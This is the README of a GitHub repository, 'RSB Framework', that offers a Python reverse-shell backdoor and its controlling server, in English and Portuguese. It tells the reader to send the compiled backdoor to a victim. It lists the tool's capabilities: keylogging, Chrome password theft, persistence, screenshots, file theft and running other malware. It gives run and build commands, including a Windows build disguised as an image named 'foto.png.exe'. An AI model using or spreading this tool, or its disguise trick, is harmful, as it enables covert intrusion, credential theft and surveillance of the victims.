Skip to content

tarcisio-marinho/RSB-Framework

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

RSB Framework

Reverse Shell Backdoor is a framework to control infected machines

[US] In this repository contains two programs. A backdoor and the user's interface. the backdoor need to be compiled sent to the victim and executed.

What's a backdoor ?

Backdoor is a computer virus popular known as trojan horse. It work's as a reverse shell to victim computer.

How to use ?

First the victim should run the backdoor compiled in the computer. 
Then when the attacker run the servidor.py he shall get a reverse connection to the victim comuter.

Victim:

python backdoor.py

Attacker:

python servidor.py

Uses

 It can be used to control the victim computer with de reverse shell.
 Also you can send and download files to the victim computer
 Get persistence -> Even if the victim shutdown the computer, the backdoor will continue working.
 Execute other programs or virus in the victims computer.

Backdoor features :

  • Remote connection.
  • Download files from the victim machine.
  • Send files to victim machine.
  • Persistence.
  • Screenshot of the victim screen.
  • Execute other programs in the victim computer.
  • Keylogger.
  • Capture Google-chrome passwords.
  • Geographic Location.
  • Change victim's computer background.
  • Backdoor complete (Only when all features ready).

Instalation

you need to install all the dependecies to run the backdoor and server.

linux:

~$ sudo pip install -r requeriments.txt

windows:

pip install -r requeriments.txt

Compiling

linux:

pyinstaller -F --clean -w backdoor.py -n backdoor

windows:

pyinstaller -F --clean -w backdoor.py -i icone.png -n foto.png.exe

===============================================================================================

[BR]

O que é uma Backdoor?

Backdoor ou popularmente conhecido como cavalo de tróia, é um tipo de vírus que ao infectar um computador, abre uma porta para o atacante conectar-se ao computador da vítma.

Objetivos:

  • Conexão remota.
  • Download arquivos da maquina infectada.
  • Upload de arquivos para maquina.
  • Persistencia.
  • Screenshot.
  • Executar outros programas na maquina da vitma.
  • Keylogger
  • Capturar senhas chrome.
  • Localização geográfica.
  • Trocar wallpaper do computador.
  • Programa completo.

Instalação

~$ sudo pip install -r requeriments.txt

COMPILAR O BACKDOOR

~$ pyinstaller -F --clean -w backdoor.py -i icone.png -n foto.png.exe